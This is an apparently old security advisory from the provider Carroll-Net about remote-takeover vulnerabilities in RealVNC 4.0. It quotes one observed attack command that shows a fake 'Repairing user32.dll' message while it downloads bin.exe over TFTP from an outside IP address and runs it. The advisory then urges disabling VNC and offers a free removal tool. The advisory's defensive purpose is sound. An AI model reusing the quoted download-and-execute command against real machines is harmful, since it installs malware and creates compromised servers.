|
Free Security Software For Your
Customers
Last month, the US Computer Emergency
Readiness Team (US-CERT) announced confirmed vulnerabilities in
RealVNC 4.0. The vulnerabilities would enable a remote
attacker to gain complete control over Windows without the need
to login. VNC has become a regular part of
an IT professional's toolkit, so this news probably comes as a
shock. Often, US-CERT announcements are treated with a
certain amount of skepticism. But Carroll-Net has
witnessed an attack mounted against one of our customers.
In the case we
witnessed, the hacker attempted the following action:
%comspec% /c echo Repairing
user32.dll &
echo Please wait... & tftp -i 24.110.251.33 GET bin.exe & start
bin &
The attack intended to download an executable
from the Internet using TFTP, and execute it. If
successful, the attacker would have created a new zombie server
for their use. Carroll-Net strongly
recommends you encourage your customers to disable VNC and only
enable it when requested by support personnel, and then only for
the duration of the support session. While the CERT advisory was
specifically for RealVNC, based on the fact all VNC software
shares a common codebase, we recommend you encourage customers
to disable all versions. We recognize that
many users lack the technical knowledge to correctly and
completely disable windows services. To make the process
simpler, Carroll-Net has developed a One Click application to
correctly and completely disable VNC. You're
welcome to distribute the software for free to your customers.
Just point them to the link
http://www.carroll.net/support/StopWinVnc.
Carroll-Net has released the source code
to StopWinVnc. If you're a Carroll-Net reseller and you'd like
to receive a copy, click
Please send me source. The source is released under
the BSD-License, and is free to modify and distribute.
Author:
jim@carroll.com |